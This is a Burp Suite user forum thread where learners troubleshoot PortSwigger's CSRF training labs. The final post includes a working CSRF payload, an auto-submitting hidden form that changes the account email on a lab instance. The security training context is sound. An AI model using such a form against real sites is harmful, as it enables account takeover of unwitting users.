Burp Suite User Forum

Create new post

CSRF Labs Broken?

Arlyn | Last updated: Jan 09, 2023 04:53PM UTC

Hi, Is it possible the CSRF labs are broken? I have attempted the following: - https://portswigger.net/web-security/csrf/lab-no-defenses - https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-request-method Despite being able to execute it perfectly to myself, when delivering it via the exploit server, I do not get the pop up saying I have passed the lab. I have also checked the solution and followed it exactly as shown and still cannot get the lab to show as completed.

Arlyn | Last updated: Jan 09, 2023 05:10PM UTC

Sorry please ignore this, my fault- it is working fine

adotvoid | Last updated: Jan 28, 2023 03:04PM UTC

Hi Arlyn. Can you let me know what your issue was. I can't seem to get any of the CSRF labs working either. Thanks in advance!

Michelle, PortSwigger Agent | Last updated: Jan 30, 2023 10:46AM UTC

Hi If you're having issues with the CSRF labs, have you tried following along with some of the Community videos?

Kavitha | Last updated: May 15, 2023 09:08PM UTC

I am facing issues with CSRF labs and I am doing it with the community version by pasting the script mentioned in the solution on the exploit server. I copied the link from burp suite and replaced it in the script. It displays 302 error in the logs.

Michelle, PortSwigger Agent | Last updated: May 16, 2023 07:31AM UTC

Hi Which of the CSRF labs are you currently working on?

pi141592 | Last updated: Mar 26, 2024 12:41PM UTC

1. Don't use url encoding in the attacker's email address of your html (use attacker@example.com instead of attacker%40example.com) 2. The email address must not used before in this lab Example: <form method="POST" action="https://0a3b009b0343732180b9dab9008c00c7.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="attacker@example.com"> </form> <script> document.forms[0].submit(); </script>

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.